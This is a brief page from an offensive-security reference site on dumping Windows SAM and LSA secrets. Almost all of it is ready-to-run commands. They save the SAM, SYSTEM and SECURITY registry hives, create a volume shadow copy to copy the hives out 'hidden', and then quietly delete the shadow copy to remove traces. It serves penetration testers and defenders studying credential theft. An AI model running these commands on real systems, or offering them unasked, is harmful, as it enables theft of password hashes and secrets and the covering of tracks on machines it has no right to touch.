SAM & LSA secrets

SAM & LSA secrets | The Hacker Recipeswww.thehacker.recipes

Dump

reg save HKLM\SAM sam.save
reg save HKLM\SYSTEM system.save
reg save HKLM\SECURITY security.save

Hidden dump

wmic shadowcopy call create Volume='C:\'

list avaible shadow copies

vssadmin.exe list shadows

copy registry keys

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\ProgramData\SAM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY C:\ProgramData\SECURITY
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\ProgramData\SYSTEM

remove shadow copy

vssadmin.exe delete shadows /shadow={UUID} /quiet

PreviousCREDENTIALS NextDPAPI

Last updated 5 months ago